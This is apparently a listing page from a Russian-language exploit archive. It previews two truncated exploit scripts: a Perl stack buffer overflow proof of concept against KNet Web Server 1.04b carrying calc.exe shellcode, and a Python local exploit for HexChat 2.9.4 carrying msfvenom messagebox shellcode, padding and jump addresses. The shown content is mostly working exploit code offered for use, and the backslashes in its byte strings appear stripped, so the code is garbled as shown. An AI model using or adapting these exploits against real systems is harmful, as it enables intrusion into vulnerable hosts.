Ссылки |
|
|
KNet Web Server 1.04b - Stack Corruption BoF Exploit |
#!/usr/bin/perl # KNet Web Server Stack corruption BoF PoC # Written by Wireghoul - http://www.justanotherhacker.com # Date: 2013/04/11 # Version: 1.04b # Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print "KNet Web Server stack corruption BoF PoC - Wireghoul - http://www.justanotherhacker.comn"; die "Usage $0 <host> <port>n" unless $host && $port; $sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to $host:$portn"; # Shellcode for calc.exe $shellcode= "x89xe2xdaxd5xd9x72xf4x5dx55x59x49x49x49x49" . "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" . "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" . "x42x75x4ax49x6bx4cx78x68x4ex69x45x50x73x30" . "x63x30x61x70x6ex69x78x65x75x61x39x42x62x44" . "x6cx4bx51x42x34x70x4ex6bx72x72x46x6cx4ex6b" . "x71x42x37x64x4ex6bx44x32x36x48x54x4fx4ex57" . "x53x7ax35x76x76x51x39x6fx44x71x4bx70x4ex4c" . "x77x4cx35x31x73x4cx47x72x64x6cx67x50x4ax61" . "x78x4fx54x4dx33x31x68x47x49x72x6ax50x73x62" . "x63x67x6cx4bx52x72x66x70x6ex6bx53x72x77x4c" . "x63x31x48x50x6ex6bx73x70x64x38x6ex65x69x50" . "x52x54x50x4ax65x51x48x50x56x30x4cx4bx70x48" . "x47x68x4cx4bx42x78x37x50x66x61x78x53x39x73" . "x77x4cx57x39x4cx4bx75x64x4cx4bx77x71x38x56" . "x70x31x59x6fx76x51x39x50x6cx6cx6fx31x6ax6f" . "x34x4dx53x31x78x47x45x68x79x70x42x55x6bx44" . "x77x73x61x6dx59x68x47x4bx51x6dx34x64x62x55" . "x4dx32x31x48x4cx4bx71x48x47x54x37x71x4ex33" . "x43x56x4ex6bx76x6cx32x6bx6cx4bx70x58x57x6c" . "x36x61x79x43x6ex6bx73x34x6ex6bx33x31x4ax70" . "x4bx39x73x74x34x64x54x64x63x6bx31x4bx65x31" . "x33x69x72x7ax70x51x39x6fx69x70x70x58x31x4f" . "x52x7ax6cx4bx36x72x58x6bx6bx36x73x6dx63x5a" . "x55x51x4cx4dx6bx35x6cx79x35x50x63x30x65x50" . "x66x30x35x38x46x51x6ex6bx50x6fx4cx47x79x6f" . "x6ex35x4dx6bx5ax50x68x35x6fx52x62x76x42x48" ...read more...
| |
| |
HexChat 2.9.4 Local Exploit Submission |
#!/usr/bin/python # HexChat 2.9.4 Local Exploit # Bug found by Jules Carter < @iMulitia > # Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B" shellcode = ( # msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c "x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49" "x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b" "x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58" "x50x38x41x42x75x4ax49x78x59x68x6bx6dx4bx4bx69" "x44x34x64x64x59x64x74x71x78x52x6cx72x33x47x34" "x71x78x49x42x44x4ex6bx50x71x50x30x4ex6bx64x36" "x54x4cx4cx4bx44x36x77x6cx4cx4bx33x76x77x78x4c" "x4bx73x4ex51x30x4ex6bx75x66x56x58x72x6fx72x38" "x51x65x68x73x43x69x37x71x38x51x39x6fx58x61x73" "x50x4ex6bx30x6cx36x44x77x54x6cx4bx42x65x75x6c" "x6ex6bx73x64x36x48x31x68x46x61x6ax4ax4ex6bx52" "x6ax66x78x6ex6bx73x6ax57x50x43x31x7ax4bx6dx33" "x34x74x42x69x6cx4bx47x44x4cx4bx67x71x48x6ex74" "x71x6bx4fx36x51x79x50x6bx4cx4ex4cx4cx44x39x50" "x34x34x75x57x49x51x4ax6fx36x6dx67x71x4ax67x5a" "x4bx5ax54x67x4bx71x6cx61x34x34x68x32x55x6dx31" "x6ex6bx33x6ax47x54x76x61x38x6bx71x76x4cx4bx64" "x4cx52x6bx4ex6bx71x4ax67x6cx67x71x4ax4bx4ex6b" "x74x44x4cx4bx76x61x69x78x4ex69x62x64x66x44x47" "x6cx63x51x5ax63x6ex52x33x38x61x39x69x44x6bx39" "x59x75x6cx49x58x42x73x58x4ex6ex72x6ex56x6ex58" "x6cx62x72x4dx38x4fx6fx6bx4fx69x6fx69x6fx4fx79" "x61x55x75x54x6dx6bx31x6ex4ex38x79x72x70x73x6f" "x77x45x4cx45x74x70x52x39x78x6cx4ex4bx4fx49x6f" "x59x6fx6fx79x43x75x55x58x73x58x62x4cx70x6cx51" "x30x77x31x53x58x67x43x54x72x66x4ex61x74x71x78" "x52x55x44x33x62x45x61x62x6dx58x51x4cx75x74x57" "x7ax4cx49x58x66x73x66x6bx4fx30x55x47x74x6bx39" "x4fx32x72x70x4dx6bx39x38x6dx72x72x6dx4fx4cx4b" "x37x35x4cx67x54x30x52x5ax48x75x31x39x6fx6bx4f" "x39x6fx33x58x42x4fx34x38x53x68x31x30x72x48x35" "x31x73x57x61x75x62x62x35x38x72x6dx72x45x54x33" "x62x53x54x71x69x4bx6fx78x33x6cx75x74x54x4ax6f" "x79x78x63x61x78x72x78x45x70x77x50x75x70x70x68" "x72x6dx50x53x37x36x77x51x70x68x43x42x30x6fx42" "x4dx71x30x35x38x52x4fx66x4cx31x30x61x76x61x78" "x71x58x50x65x42x4cx32x4cx55x61x5ax69x6ex68x72" "x6cx61x34x44x50x4fx79x4dx31x56x51x4bx62x33x62" "x61x43x46x31x52x72x39x6fx58x50x46x51x49x50x42" "x70x69x6fx36x35x34x48x41x41" ) junk2 = "A"*(13306-len(shellcode)) stage1 = "x4cx4cx77x21" # 21 byte jump (JA) ret = "x63x64x62x68" # ASCII PPR junk3 = "C" stage2 = "x61" # POPAD x 38 stage2 ...read more...
| |
| |
Всего 6154 на 206 страницах по 30 на каждой странице [<<] [ 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | ... | 206 ] [>>] |
|
|
Ссылки |
---|
|
|